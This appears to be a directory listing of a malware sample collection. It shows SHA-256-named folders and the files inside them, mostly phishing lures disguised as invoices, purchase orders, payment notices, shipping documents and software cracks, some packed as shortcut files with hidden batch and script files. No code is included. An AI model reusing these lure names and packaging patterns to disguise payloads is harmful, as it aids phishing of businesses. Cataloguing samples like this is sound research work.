.\b790d8d67ccb10c65fe253c74bf0acdc07c7f2f1577e02facb5bd08c359e67a2b790d8d67ccb10c65fe253c74bf0acdc07c7f2f1577e02facb5bd08c359e67a2_1661938885['.\b790d8d67ccb10c65fe253c74bf0acdc07c7f2f1577e02facb5bd08c359e67a2_1661938885/Payment Adivse.exe']
.\b7b67336f9909b8b8dfef398896b68fccc5a11954e728dde64ae1a2e1d450d4cb7b67336f9909b8b8dfef398896b68fccc5a11954e728dde64ae1a2e1d450d4c_1661938885['.\b7b67336f9909b8b8dfef398896b68fccc5a11954e728dde64ae1a2e1d450d4c_1661938885/RFQ_2022_PROJECT.exe']
.\b9445628c9f3626d0bdad5e360499c216cf7659498484f35f30862d3ca788fa6b9445628c9f3626d0bdad5e360499c216cf7659498484f35f30862d3ca788fa6_1661938885['.\b9445628c9f3626d0bdad5e360499c216cf7659498484f35f30862d3ca788fa6_1661938885/JULY2022 SOA.exe']
.\ba287dda4082158f94e8aa217e9acec1518a7c984432605801752dbe36010ae7ba287dda4082158f94e8aa217e9acec1518a7c984432605801752dbe36010ae7_1661938885['.\ba287dda4082158f94e8aa217e9acec1518a7c984432605801752dbe36010ae7_1661938885/jd4vC0E7LuAFCcy.exe']
.\ba6fd89f634cf83cc91eb9401f671f33e3457b4cbff13d229054be507660c315ba6fd89f634cf83cc91eb9401f671f33e3457b4cbff13d229054be507660c315_1661938885['.\ba6fd89f634cf83cc91eb9401f671f33e3457b4cbff13d229054be507660c315_1661938885/Secpralpro Order Q3 FTD52535345675 .vbs']
.\bb358ae3b4a58d5f05af3752894c1b080806000e5d3d542eba4437014bbede1fbb358ae3b4a58d5f05af3752894c1b080806000e5d3d542eba4437014bbede1f_1661938885['.\bb358ae3b4a58d5f05af3752894c1b080806000e5d3d542eba4437014bbede1f_1661938885/103_FT22195J8MKV_0461571799.exe']
.\bbbe999c5d07a3f4abdad8ed0d15c230e233acfd8fbcc90a5f7e010ab80ff85fbbbe999c5d07a3f4abdad8ed0d15c230e233acfd8fbcc90a5f7e010ab80ff85f_1661938885['.\bbbe999c5d07a3f4abdad8ed0d15c230e233acfd8fbcc90a5f7e010ab80ff85f_1661938885/Xerox Scan 85345353.exe']
.\bbf30829bcb998ce2aa66993aee934d8656310da34079a1993d26a5b30958e80bbf30829bcb998ce2aa66993aee934d8656310da34079a1993d26a5b30958e80_1661938885['.\bbf30829bcb998ce2aa66993aee934d8656310da34079a1993d26a5b30958e80_1661938885/SP.9686_Flex_rev_2_BL65338.exe']
.\bc5251b044778dc3bc552766edda6cdf90e99509a7c7cd40e26ef38426497fd4bc5251b044778dc3bc552766edda6cdf90e99509a7c7cd40e26ef38426497fd4_1661938885"['.\bc5251b044778dc3bc552766edda6cdf90e99509a7c7cd40e26ef38426497fd4_1661938885/CH440-3031 New Inquiry 13822.exe', '.\bc5251b044778dc3bc552766edda6cdf90e99509a7c7cd40e26ef38426497fd4_1661938885/logo.png']"
.\bddc75e56384d1979b5bc35cb8056b284a20c1926edcb2ed5a9063fba0697af7bddc75e56384d1979b5bc35cb8056b284a20c1926edcb2ed5a9063fba0697af7_1661938885['.\bddc75e56384d1979b5bc35cb8056b284a20c1926edcb2ed5a9063fba0697af7_1661938885/SWIFT Transfer (103) 037RTG2050822156__Pdf__.exe']
.\bea4bb8dad82ba893ffca009e79cd0a1e7d3db92def1a02b7e8aa5681277ca24bea4bb8dad82ba893ffca009e79cd0a1e7d3db92def1a02b7e8aa5681277ca24_1661938885['.\bea4bb8dad82ba893ffca009e79cd0a1e7d3db92def1a02b7e8aa5681277ca24_1661938885/107333454.exe']
.\bf48347972069e8277d179de8004fbe5372d66213d8bf130aaceb259fe5cd78bbf48347972069e8277d179de8004fbe5372d66213d8bf130aaceb259fe5cd78b_1661938885['.\bf48347972069e8277d179de8004fbe5372d66213d8bf130aaceb259fe5cd78b_1661938885/Order EXT 456574834 - SENTE MAKINA COMMERCIAL INVOICE.vbs']
.\c36a3302401e85c0db0b33d002b458f384eb68706c3f278d7f80af073bd5041ac36a3302401e85c0db0b33d002b458f384eb68706c3f278d7f80af073bd5041a_1661938885
.\c4315611234ad58db6569be0908ee54f88995f71b1ad6052bc53920354cb6c2ec4315611234ad58db6569be0908ee54f88995f71b1ad6052bc53920354cb6c2e_1661938885['.\c4315611234ad58db6569be0908ee54f88995f71b1ad6052bc53920354cb6c2e_1661938885/setup.exe']
.\c4b0996052092a0e53f6946aecc9056a1e65bab087893a0499454f9d7697b992c4b0996052092a0e53f6946aecc9056a1e65bab087893a0499454f9d7697b992_1661938885"['.\c4b0996052092a0e53f6946aecc9056a1e65bab087893a0499454f9d7697b992_1661938885/documents.lnk', '.\c4b0996052092a0e53f6946aecc9056a1e65bab087893a0499454f9d7697b992_1661938885/into/ifThe.bat', '.\c4b0996052092a0e53f6946aecc9056a1e65bab087893a0499454f9d7697b992_1661938885/into/make.jpg', '.\c4b0996052092a0e53f6946aecc9056a1e65bab087893a0499454f9d7697b992_1661938885/into/otherHer.js', '.\c4b0996052092a0e53f6946aecc9056a1e65bab087893a0499454f9d7697b992_1661938885/into/want.png', '.\c4b0996052092a0e53f6946aecc9056a1e65bab087893a0499454f9d7697b992_1661938885/into/wouldNo.txt']".\c4b0996052092a0e53f6946aecc9056a1e65bab087893a0499454f9d7697b992_1661938885/documents.lnkinto/ifThe.bat
.\c50778c40a364eb3ebfa083ed96f9ee78fb5fce3c73aee359ff7d359ae508642c50778c40a364eb3ebfa083ed96f9ee78fb5fce3c73aee359ff7d359ae508642_1661938885['.\c50778c40a364eb3ebfa083ed96f9ee78fb5fce3c73aee359ff7d359ae508642_1661938885/File89384874857_8938384747475.vbs']
.\c50a8f7ba05f56e350cc65a1c8fdd5083a88f725bdb3eb3ac0cca4cbb7b12e6cc50a8f7ba05f56e350cc65a1c8fdd5083a88f725bdb3eb3ac0cca4cbb7b12e6c_1661938885['.\c50a8f7ba05f56e350cc65a1c8fdd5083a88f725bdb3eb3ac0cca4cbb7b12e6c_1661938885/Quotation Request - 12 August.exe']
.\c5412ccdc10eedc9d7c060c408c747e2fbb4568131568cea20964d7c01b5d785c5412ccdc10eedc9d7c060c408c747e2fbb4568131568cea20964d7c01b5d785_1661938885['.\c5412ccdc10eedc9d7c060c408c747e2fbb4568131568cea20964d7c01b5d785_1661938885/8599223560012.exe']
.\c6628d9438f143ec06fa1024c7c6b3b21158dec41bea7ba01f72d525cf670a1cc6628d9438f143ec06fa1024c7c6b3b21158dec41bea7ba01f72d525cf670a1c_1661938885['.\c6628d9438f143ec06fa1024c7c6b3b21158dec41bea7ba01f72d525cf670a1c_1661938885/pago.exe;1']
.\c6808f6f407cc4254b58ac31fb63d71ae4106f361a3fe68583ba79730c1d54acc6808f6f407cc4254b58ac31fb63d71ae4106f361a3fe68583ba79730c1d54ac_1661938885"['.\c6808f6f407cc4254b58ac31fb63d71ae4106f361a3fe68583ba79730c1d54ac_1661938885/documents.lnk', '.\c6808f6f407cc4254b58ac31fb63d71ae4106f361a3fe68583ba79730c1d54ac_1661938885/into/IMore.js', '.\c6808f6f407cc4254b58ac31fb63d71ae4106f361a3fe68583ba79730c1d54ac_1661938885/into/atMake.bat', '.\c6808f6f407cc4254b58ac31fb63d71ae4106f361a3fe68583ba79730c1d54ac_1661938885/into/make.jpg', '.\c6808f6f407cc4254b58ac31fb63d71ae4106f361a3fe68583ba79730c1d54ac_1661938885/into/manHis.txt', '.\c6808f6f407cc4254b58ac31fb63d71ae4106f361a3fe68583ba79730c1d54ac_1661938885/into/want.png']".\c6808f6f407cc4254b58ac31fb63d71ae4106f361a3fe68583ba79730c1d54ac_1661938885/documents.lnkinto/atMake.bat
.\c7ac158ea5d69b713fe8416ed75c4a5c59e467647c144b0a3ff9fe1d1ebbad98c7ac158ea5d69b713fe8416ed75c4a5c59e467647c144b0a3ff9fe1d1ebbad98_1661938885"['.\c7ac158ea5d69b713fe8416ed75c4a5c59e467647c144b0a3ff9fe1d1ebbad98_1661938885/AK Food ZAMÓWIENIE ZAKUPU,pdf.exe']"
.\c8014133ac5b0bab3ce8357eaef747065d6b6bd2213ad97795506fe6b36c19a4c8014133ac5b0bab3ce8357eaef747065d6b6bd2213ad97795506fe6b36c19a4_1661938885"['.\c8014133ac5b0bab3ce8357eaef747065d6b6bd2213ad97795506fe6b36c19a4_1661938885/E.J.B. cintas adhesivas ORDEN DE COMPRA ,pdf.exe']"
.\c86e284b55cd7bcdba14aa78e0a5b59485bdfc7e60f4a88bc22e26ccc2ef6cc8c86e284b55cd7bcdba14aa78e0a5b59485bdfc7e60f4a88bc22e26ccc2ef6cc8_1661938885['.\c86e284b55cd7bcdba14aa78e0a5b59485bdfc7e60f4a88bc22e26ccc2ef6cc8_1661938885/RFQ-36996 OTC - SDMO.exe']
.\cb2a16478a698a252b16185b36c07a4c6ee7284eaf57d26e5b3cd57d78a67cefcb2a16478a698a252b16185b36c07a4c6ee7284eaf57d26e5b3cd57d78a67cef_1661938885['.\cb2a16478a698a252b16185b36c07a4c6ee7284eaf57d26e5b3cd57d78a67cef_1661938885/Vehpxyehcigmbvekraxwbopgjsexcuxsqv.exe']
.\cb2d925fa393d4a75046c68a6965c0736c8741a9bf15955cd25df4a843dcb8e6cb2d925fa393d4a75046c68a6965c0736c8741a9bf15955cd25df4a843dcb8e6_1661938885"['.\cb2d925fa393d4a75046c68a6965c0736c8741a9bf15955cd25df4a843dcb8e6_1661938885/Подтвердить заказ-1969_V5 # 8346,pdf.exe']"
.\cb2faef0fff0a36084ba707837e74b9e413ac7d12c719adfc7dfce099e738d40cb2faef0fff0a36084ba707837e74b9e413ac7d12c719adfc7dfce099e738d40_1661938885['.\cb2faef0fff0a36084ba707837e74b9e413ac7d12c719adfc7dfce099e738d40_1661938885/Enq605778.exe']
.\cb3698a4913a354fcdf4bcb24bd6e2b749464684dbed06e4f05392e37391954bcb3698a4913a354fcdf4bcb24bd6e2b749464684dbed06e4f05392e37391954b_1661938885"['.\cb3698a4913a354fcdf4bcb24bd6e2b749464684dbed06e4f05392e37391954b_1661938885/Belaquilon SATIN ALMA SİPARİŞ_U00162,pdf.exe']"
.\cf7a5e3674c2f0d9ca68ce2c3f1c6bdf461dfe5a27759fab78cdd14dcf398e4fcf7a5e3674c2f0d9ca68ce2c3f1c6bdf461dfe5a27759fab78cdd14dcf398e4f_1661938885['.\cf7a5e3674c2f0d9ca68ce2c3f1c6bdf461dfe5a27759fab78cdd14dcf398e4f_1661938885/9810_219_pdf.exe']
.\d0b91a41f61a03352dc51f9fa4e4ff4a6e851142df6914af5514cc49ede6e633d0b91a41f61a03352dc51f9fa4e4ff4a6e851142df6914af5514cc49ede6e633_1661938885['.\d0b91a41f61a03352dc51f9fa4e4ff4a6e851142df6914af5514cc49ede6e633_1661938885/Umybvakoqtcdijocoypfwpjrcqomzlsnbt.exe']
.\d12a5a4082fecf612866f40a51b6b90b181f62f4666a087e4275776eeafe23b7d12a5a4082fecf612866f40a51b6b90b181f62f4666a087e4275776eeafe23b7_1661938885['.\d12a5a4082fecf612866f40a51b6b90b181f62f4666a087e4275776eeafe23b7_1661938885/Documento de entrega de envío DHL227024.exe']
.\d24e3e2502cedc54c0dc1b8199ff09d9736cd64ac15a53724054322bbebe2210d24e3e2502cedc54c0dc1b8199ff09d9736cd64ac15a53724054322bbebe2210_1661938885['.\d24e3e2502cedc54c0dc1b8199ff09d9736cd64ac15a53724054322bbebe2210_1661938885/Cerere de oferta P.0- 202208100237RO.vbs']
.\d2e198ac34eca52379e711c1b2fd2f49b319f234c3fe08f175e73dd0f38abac3d2e198ac34eca52379e711c1b2fd2f49b319f234c3fe08f175e73dd0f38abac3_1661938885"['.\d2e198ac34eca52379e711c1b2fd2f49b319f234c3fe08f175e73dd0f38abac3_1661938885/documents.lnk', '.\d2e198ac34eca52379e711c1b2fd2f49b319f234c3fe08f175e73dd0f38abac3_1661938885/then/by.txt', '.\d2e198ac34eca52379e711c1b2fd2f49b319f234c3fe08f175e73dd0f38abac3_1661938885/then/day.gif', '.\d2e198ac34eca52379e711c1b2fd2f49b319f234c3fe08f175e73dd0f38abac3_1661938885/then/dayWillSaySomeJust.txt', '.\d2e198ac34eca52379e711c1b2fd2f49b319f234c3fe08f175e73dd0f38abac3_1661938885/then/doGiveByJustIts.bat', '.\d2e198ac34eca52379e711c1b2fd2f49b319f234c3fe08f175e73dd0f38abac3_1661938885/then/he.png', '.\d2e198ac34eca52379e711c1b2fd2f49b319f234c3fe08f175e73dd0f38abac3_1661938885/then/onMyNotSeeI.js', '.\d2e198ac34eca52379e711c1b2fd2f49b319f234c3fe08f175e73dd0f38abac3_1661938885/then/use.txt']".\d2e198ac34eca52379e711c1b2fd2f49b319f234c3fe08f175e73dd0f38abac3_1661938885/documents.lnkthen/doGiveByJustIts.bat
.\d3c15ef717e5a56d165848d5c518f158ec75ea5f5906a0f9c56b01036a6999bcd3c15ef717e5a56d165848d5c518f158ec75ea5f5906a0f9c56b01036a6999bc_1661938885"['.\d3c15ef717e5a56d165848d5c518f158ec75ea5f5906a0f9c56b01036a6999bc_1661938885/RFQ 103404_001 08182022,pdf.exe']"
.\d403df3fb181560d6ebf4885b538c5af86e718fecfabc73219b64924d74dd0ebd403df3fb181560d6ebf4885b538c5af86e718fecfabc73219b64924d74dd0eb_1661938885"['.\d403df3fb181560d6ebf4885b538c5af86e718fecfabc73219b64924d74dd0eb_1661938885/app.dll', '.\d403df3fb181560d6ebf4885b538c5af86e718fecfabc73219b64924d74dd0eb_1661938885/pss10r.chm']"
.\d443c27b8018d7a49f99396375c391107e5e22630365cada5626ee2c4fb57e49d443c27b8018d7a49f99396375c391107e5e22630365cada5626ee2c4fb57e49_1661938885['.\d443c27b8018d7a49f99396375c391107e5e22630365cada5626ee2c4fb57e49_1661938885/Inquiry - RFQ HMGU66sw5558.exe']
.\d45e465d78d74d0679dd8c2d8c14894174007abdc9c2cff61c24c74c09b625abd45e465d78d74d0679dd8c2d8c14894174007abdc9c2cff61c24c74c09b625ab_1661938885['.\d45e465d78d74d0679dd8c2d8c14894174007abdc9c2cff61c24c74c09b625ab_1661938885/BBVA Pago_Copia_RX4227654_scan.exe']
.\d47b79e083d123bb135e4b6b00c7cdf81f235b73c1eac0cf1275157043406076d47b79e083d123bb135e4b6b00c7cdf81f235b73c1eac0cf1275157043406076_1661938885['.\d47b79e083d123bb135e4b6b00c7cdf81f235b73c1eac0cf1275157043406076_1661938885/commercial invoice.exe']
.\d4a24e2dbad00129c9a7aaa496bdc82d42b51511b22243812700e8608e2f6215d4a24e2dbad00129c9a7aaa496bdc82d42b51511b22243812700e8608e2f6215_1661938885['.\d4a24e2dbad00129c9a7aaa496bdc82d42b51511b22243812700e8608e2f6215_1661938885/cheat oss-3066872d.exe']
.\d565dd384ad49ca5bba44cf49fc0782037ba718ad88776d01a0c07f37a993ba8d565dd384ad49ca5bba44cf49fc0782037ba718ad88776d01a0c07f37a993ba8_1661938885['.\d565dd384ad49ca5bba44cf49fc0782037ba718ad88776d01a0c07f37a993ba8_1661938885/BL COPY- CIF LCL SEA SHIPMENT.exe']
.\d7e6c31af1b6a6cdf936a6709ecdec4abcccdbe15cb99f0607f0c6b45c8b3708d7e6c31af1b6a6cdf936a6709ecdec4abcccdbe15cb99f0607f0c6b45c8b3708_1661938885['.\d7e6c31af1b6a6cdf936a6709ecdec4abcccdbe15cb99f0607f0c6b45c8b3708_1661938885/pubg-ultrainstinct-bvff-3b256d.exe']
.\d82586019d0c036e37d52afe6b10530078bf101e73761c6f892fe064ee2339d0d82586019d0c036e37d52afe6b10530078bf101e73761c6f892fe064ee2339d0_1661938885"['.\d82586019d0c036e37d52afe6b10530078bf101e73761c6f892fe064ee2339d0_1661938885/invoice-not-paid-date08-08-22-pdf.lnk', '.\d82586019d0c036e37d52afe6b10530078bf101e73761c6f892fe064ee2339d0_1661938885/at/but.txt', '.\d82586019d0c036e37d52afe6b10530078bf101e73761c6f892fe064ee2339d0_1661938885/at/ofThereBeHereSee.bat', '.\d82586019d0c036e37d52afe6b10530078bf101e73761c6f892fe064ee2339d0_1661938885/at/oneWeThoseWellOnly.txt', '.\d82586019d0c036e37d52afe6b10530078bf101e73761c6f892fe064ee2339d0_1661938885/at/time.gif', '.\d82586019d0c036e37d52afe6b10530078bf101e73761c6f892fe064ee2339d0_1661938885/at/twoHimMyTheirBy.js']".\d82586019d0c036e37d52afe6b10530078bf101e73761c6f892fe064ee2339d0_1661938885/invoice-not-paid-date08-08-22-pdf.lnkat/ofThereBeHereSee.bat
.\d900b74a61fe87075dfcbfa87369cc42a66f306c2d65c3370eec76ebd05b5375d900b74a61fe87075dfcbfa87369cc42a66f306c2d65c3370eec76ebd05b5375_1661938885['.\d900b74a61fe87075dfcbfa87369cc42a66f306c2d65c3370eec76ebd05b5375_1661938885/FILE663736464_778837364747.vbs']
.\d955c8171c6d66a1edaeb9d9585d6f9421fa62075665de4949340668582c3412d955c8171c6d66a1edaeb9d9585d6f9421fa62075665de4949340668582c3412_1661938885"['.\d955c8171c6d66a1edaeb9d9585d6f9421fa62075665de4949340668582c3412_1661938885/Invoice_August-16-2022.lnk', '.\d955c8171c6d66a1edaeb9d9585d6f9421fa62075665de4949340668582c3412_1661938885/it/goBe.js', '.\d955c8171c6d66a1edaeb9d9585d6f9421fa62075665de4949340668582c3412_1661938885/it/goNew.txt', '.\d955c8171c6d66a1edaeb9d9585d6f9421fa62075665de4949340668582c3412_1661938885/it/out.jpg', '.\d955c8171c6d66a1edaeb9d9585d6f9421fa62075665de4949340668582c3412_1661938885/it/thisOur.bat', '.\d955c8171c6d66a1edaeb9d9585d6f9421fa62075665de4949340668582c3412_1661938885/it/which.txt']".\d955c8171c6d66a1edaeb9d9585d6f9421fa62075665de4949340668582c3412_1661938885/Invoice_August-16-2022.lnkit/thisOur.bat
.\d9d84639c4a38a13a4f9bfaa4c9d41e4d575f9fab90cc4c1f9268be18adf426bd9d84639c4a38a13a4f9bfaa4c9d41e4d575f9fab90cc4c1f9268be18adf426b_1661938885['.\d9d84639c4a38a13a4f9bfaa4c9d41e4d575f9fab90cc4c1f9268be18adf426b_1661938885/Inquiry.exe;1']
.\db548d467909c4c54b7bda22c122f9c148b1c25c1bfcdaf6a6ab5249532adfeedb548d467909c4c54b7bda22c122f9c148b1c25c1bfcdaf6a6ab5249532adfee_1661938885['.\db548d467909c4c54b7bda22c122f9c148b1c25c1bfcdaf6a6ab5249532adfee_1661938885/SOA August 2022.exe']
.\dc310ebeb030a47ae3e5719455f4bd53ab7c3e32f2483a8feb6243724ea56dcddc310ebeb030a47ae3e5719455f4bd53ab7c3e32f2483a8feb6243724ea56dcd_1661938885['.\dc310ebeb030a47ae3e5719455f4bd53ab7c3e32f2483a8feb6243724ea56dcd_1661938885/KMSpico 10.2 Full.exe']
.\dec242ac785a770f4f4c2b3c845049176ffab0b28a3398518cda07baca7a45e9dec242ac785a770f4f4c2b3c845049176ffab0b28a3398518cda07baca7a45e9_1661938885"['.\dec242ac785a770f4f4c2b3c845049176ffab0b28a3398518cda07baca7a45e9_1661938885/Invoice-August-09-2022pdf.lnk', '.\dec242ac785a770f4f4c2b3c845049176ffab0b28a3398518cda07baca7a45e9_1661938885/your/give.txt', '.\dec242ac785a770f4f4c2b3c845049176ffab0b28a3398518cda07baca7a45e9_1661938885/your/ourWillBecauseJustAll.bat', '.\dec242ac785a770f4f4c2b3c845049176ffab0b28a3398518cda07baca7a45e9_1661938885/your/say.txt', '.\dec242ac785a770f4f4c2b3c845049176ffab0b28a3398518cda07baca7a45e9_1661938885/your/tell.txt', '.\dec242ac785a770f4f4c2b3c845049176ffab0b28a3398518cda07baca7a45e9_1661938885/your/thing.gif', '.\dec242ac785a770f4f4c2b3c845049176ffab0b28a3398518cda07baca7a45e9_1661938885/your/whoManSoHaveOut.txt', '.\dec242ac785a770f4f4c2b3c845049176ffab0b28a3398518cda07baca7a45e9_1661938885/your/yourHereItsWhatYou.js']".\dec242ac785a770f4f4c2b3c845049176ffab0b28a3398518cda07baca7a45e9_1661938885/Invoice-August-09-2022pdf.lnkyour/ourWillBecauseJustAll.bat
.\dec44e1bef65a6d4262eb60b7bea9298674180e560dd6aac5a6144a316459565dec44e1bef65a6d4262eb60b7bea9298674180e560dd6aac5a6144a316459565_1661938885['.\dec44e1bef65a6d4262eb60b7bea9298674180e560dd6aac5a6144a316459565_1661938885/KMS_VL_ALL_AIO.cmd']
.\df33af086cee261d4c34eaaaeaa9c9cad5290bf0509d2521c9b2fc82568927d4df33af086cee261d4c34eaaaeaa9c9cad5290bf0509d2521c9b2fc82568927d4_1661938885['.\df33af086cee261d4c34eaaaeaa9c9cad5290bf0509d2521c9b2fc82568927d4_1661938885/RFQ-202208180217AM.exe']
.\e075fbaef8bf1e5cb959c5bd7f5f1db51968f2bf67e64be02244804bf277ce4fe075fbaef8bf1e5cb959c5bd7f5f1db51968f2bf67e64be02244804bf277ce4f_1661938886['.\e075fbaef8bf1e5cb959c5bd7f5f1db51968f2bf67e64be02244804bf277ce4f_1661938886/RFQ - ZEECO USA 升級項目/RFQ - ZEECO USA 升級項目.exe']
.\e0b8d125213d81163bdf7c519d3b37fa70a624dc8ef35bb4758ffb1db72b053ee0b8d125213d81163bdf7c519d3b37fa70a624dc8ef35bb4758ffb1db72b053e_1661938886"['.\e0b8d125213d81163bdf7c519d3b37fa70a624dc8ef35bb4758ffb1db72b053e_1661938886/SoundBoosterSetup.exe', '.\e0b8d125213d81163bdf7c519d3b37fa70a624dc8ef35bb4758ffb1db72b053e_1661938886/Crack/Patch.rar', '.\e0b8d125213d81163bdf7c519d3b37fa70a624dc8ef35bb4758ffb1db72b053e_1661938886/Crack/Patch/Patch.exe']"
.\e0f92bd5aa472a99caad4cf721589ead72498c20f83176abf284f3d525a31faee0f92bd5aa472a99caad4cf721589ead72498c20f83176abf284f3d525a31fae_1661938886['.\e0f92bd5aa472a99caad4cf721589ead72498c20f83176abf284f3d525a31fae_1661938886/Quotation-17-08-22.exe']
.\e252bb22fa8a52806faae965ae7434122b744b55db0961209571b36ec282362fe252bb22fa8a52806faae965ae7434122b744b55db0961209571b36ec282362f_1661938886"['.\e252bb22fa8a52806faae965ae7434122b744b55db0961209571b36ec282362f_1661938886/Invoice-August-09-2022pdf.lnk', '.\e252bb22fa8a52806faae965ae7434122b744b55db0961209571b36ec282362f_1661938886/your/give.txt', '.\e252bb22fa8a52806faae965ae7434122b744b55db0961209571b36ec282362f_1661938886/your/hisOneWillOrYou.js', '.\e252bb22fa8a52806faae965ae7434122b744b55db0961209571b36ec282362f_1661938886/your/howHeOneToIts.bat', '.\e252bb22fa8a52806faae965ae7434122b744b55db0961209571b36ec282362f_1661938886/your/ifTheyHowHereOut.txt', '.\e252bb22fa8a52806faae965ae7434122b744b55db0961209571b36ec282362f_1661938886/your/say.txt', '.\e252bb22fa8a52806faae965ae7434122b744b55db0961209571b36ec282362f_1661938886/your/tell.txt', '.\e252bb22fa8a52806faae965ae7434122b744b55db0961209571b36ec282362f_1661938886/your/thing.gif']".\e252bb22fa8a52806faae965ae7434122b744b55db0961209571b36ec282362f_1661938886/Invoice-August-09-2022pdf.lnkyour/howHeOneToIts.bat
.\e25fcdf70b541d08e9416ec13b47b5d93b0e883fb8ee2ee4222281590bbd5fdbe25fcdf70b541d08e9416ec13b47b5d93b0e883fb8ee2ee4222281590bbd5fdb_1661938886['.\e25fcdf70b541d08e9416ec13b47b5d93b0e883fb8ee2ee4222281590bbd5fdb_1661938886/OC 2022 08 11 1670 Intelservice SAS_pdf.exe']
.\e375feb904f3e8f7d5e26c0f79dec2bbb17a8c2b6fee74a96f7f4a1fbed95a25e375feb904f3e8f7d5e26c0f79dec2bbb17a8c2b6fee74a96f7f4a1fbed95a25_1661938886['.\e375feb904f3e8f7d5e26c0f79dec2bbb17a8c2b6fee74a96f7f4a1fbed95a25_1661938886/Re Re Re Re ขอขยายพันธุ์.exe']
.\e47d353419e5b3f80ae9431a2ff3c575bac131e8d69efd9ce0ef2772aae2d506e47d353419e5b3f80ae9431a2ff3c575bac131e8d69efd9ce0ef2772aae2d506_1661938886['.\e47d353419e5b3f80ae9431a2ff3c575bac131e8d69efd9ce0ef2772aae2d506_1661938886/SOA August 2022.exe']
.\e4fd6fb8d277b2fd28fa9999c2fc11d5100b9bed4803b629990cd6720d4deebee4fd6fb8d277b2fd28fa9999c2fc11d5100b9bed4803b629990cd6720d4deebe_1661938886['.\e4fd6fb8d277b2fd28fa9999c2fc11d5100b9bed4803b629990cd6720d4deebe_1661938886/4OmGG2uEHRKdlRp.exe']
.\e54fae4178c6b78888e8eb0e5ff58f3aa7a6fb0811ac502effd00a848d3b55d0e54fae4178c6b78888e8eb0e5ff58f3aa7a6fb0811ac502effd00a848d3b55d0_1661938886"['.\e54fae4178c6b78888e8eb0e5ff58f3aa7a6fb0811ac502effd00a848d3b55d0_1661938886/documents.lnk', '.\e54fae4178c6b78888e8eb0e5ff58f3aa7a6fb0811ac502effd00a848d3b55d0_1661938886/one/newDay.js', '.\e54fae4178c6b78888e8eb0e5ff58f3aa7a6fb0811ac502effd00a848d3b55d0_1661938886/one/useOn.txt', '.\e54fae4178c6b78888e8eb0e5ff58f3aa7a6fb0811ac502effd00a848d3b55d0_1661938886/one/whichWill.bat']".\e54fae4178c6b78888e8eb0e5ff58f3aa7a6fb0811ac502effd00a848d3b55d0_1661938886/documents.lnkone/whichWill.bat
.\e634f5a6e51c81269feb6f6030ae8edc03f4b9e295f7944acb48bd6edfa16c64e634f5a6e51c81269feb6f6030ae8edc03f4b9e295f7944acb48bd6edfa16c64_1661938886['.\e634f5a6e51c81269feb6f6030ae8edc03f4b9e295f7944acb48bd6edfa16c64_1661938886/Proof_Of_Payment.exe']
.\e6fa0ede71a3056c770d816013141993c95d7d939d04292eb58b4681a1fd681fe6fa0ede71a3056c770d816013141993c95d7d939d04292eb58b4681a1fd681f_1661938886['.\e6fa0ede71a3056c770d816013141993c95d7d939d04292eb58b4681a1fd681f_1661938886/Order 2022-10396P2615_pdf .exe']
.\e7dada5b84136b5e46eca4ab48474029cecd1ffb7fc401245d53e45620d160cee7dada5b84136b5e46eca4ab48474029cecd1ffb7fc401245d53e45620d160ce_1661938886"['.\e7dada5b84136b5e46eca4ab48474029cecd1ffb7fc401245d53e45620d160ce_1661938886/KMSPico 10.2.1.exe;1', '.\e7dada5b84136b5e46eca4ab48474029cecd1ffb7fc401245d53e45620d160ce_1661938886/ReadMe.txt;1']"
.\e840ef7f7830f49d9b9499ca2081d0a465060fbe49d5a887d20615549234758de840ef7f7830f49d9b9499ca2081d0a465060fbe49d5a887d20615549234758d_1661938886['.\e840ef7f7830f49d9b9499ca2081d0a465060fbe49d5a887d20615549234758d_1661938886/xerox scan_2435767946352_pdf .exe']
.\e9f8b624c52909f52c4bed5550d4cf6baba775ae8e09a740c8d974e091dcb8aae9f8b624c52909f52c4bed5550d4cf6baba775ae8e09a740c8d974e091dcb8aa_1661938886['.\e9f8b624c52909f52c4bed5550d4cf6baba775ae8e09a740c8d974e091dcb8aa_1661938886/DHL Delivery Invoice.pdf.exe']
.\eb414524fddc80f278f394ce7c7009cb6d68eef4b5d9aee61fbf5d158ac17593eb414524fddc80f278f394ce7c7009cb6d68eef4b5d9aee61fbf5d158ac17593_1661938886['.\eb414524fddc80f278f394ce7c7009cb6d68eef4b5d9aee61fbf5d158ac17593_1661938886/TheGreatSuspenderSetup.exe']
.\ecafdefdeae047a6493e7bad8401b173c4ebb2e212f778781bf63f189f1f15b1ecafdefdeae047a6493e7bad8401b173c4ebb2e212f778781bf63f189f1f15b1_1661938886['.\ecafdefdeae047a6493e7bad8401b173c4ebb2e212f778781bf63f189f1f15b1_1661938886/PO 6999001.exe']
.\ecbfc891302d0ab2beeda8234b11efcc37018ba3d73951a1e5ce7957667ff0b2ecbfc891302d0ab2beeda8234b11efcc37018ba3d73951a1e5ce7957667ff0b2_1661938886['.\ecbfc891302d0ab2beeda8234b11efcc37018ba3d73951a1e5ce7957667ff0b2_1661938886/final-fantasy-5-repack-spacex_519227.exe']
.\ed6b0c10b8788598a6b260f458f6d96d78ae8ec322ec0e7cc4f381d7c801248eed6b0c10b8788598a6b260f458f6d96d78ae8ec322ec0e7cc4f381d7c801248e_1661938886['.\ed6b0c10b8788598a6b260f458f6d96d78ae8ec322ec0e7cc4f381d7c801248e_1661938886/CAESAR.exe']
.\edadd5ceed4c0b6f8b177c23c3a5025a07404da5f23e8fbac3008a32c76cb475edadd5ceed4c0b6f8b177c23c3a5025a07404da5f23e8fbac3008a32c76cb475_1661938886['.\edadd5ceed4c0b6f8b177c23c3a5025a07404da5f23e8fbac3008a32c76cb475_1661938886/ISOPRIME POWER TRANSFORMER & ELECTRICAL SOLUTIONS PO 356FBG.exe']
.\edae4fe94e823513d9c1db17a25b17543b1a252141733524f40c0db49747bfdaedae4fe94e823513d9c1db17a25b17543b1a252141733524f40c0db49747bfda_1661938886['.\edae4fe94e823513d9c1db17a25b17543b1a252141733524f40c0db49747bfda_1661938886/Megrendelés 09082022_pdf.exe']
.\ee09b30f1815b5fb79ddc5636bfd483705134cd5c2fe60cc015d67664a20820fee09b30f1815b5fb79ddc5636bfd483705134cd5c2fe60cc015d67664a20820f_1661938886['.\ee09b30f1815b5fb79ddc5636bfd483705134cd5c2fe60cc015d67664a20820f_1661938886/New Order.exe']
.\ee2eca88fd905172d4ae99b609267d608967226edc042eae33e2b0e32eb7d1efee2eca88fd905172d4ae99b609267d608967226edc042eae33e2b0e32eb7d1ef_1661938886['.\ee2eca88fd905172d4ae99b609267d608967226edc042eae33e2b0e32eb7d1ef_1661938886/報價請求 - viva(2015AS-2208HK).vbs']
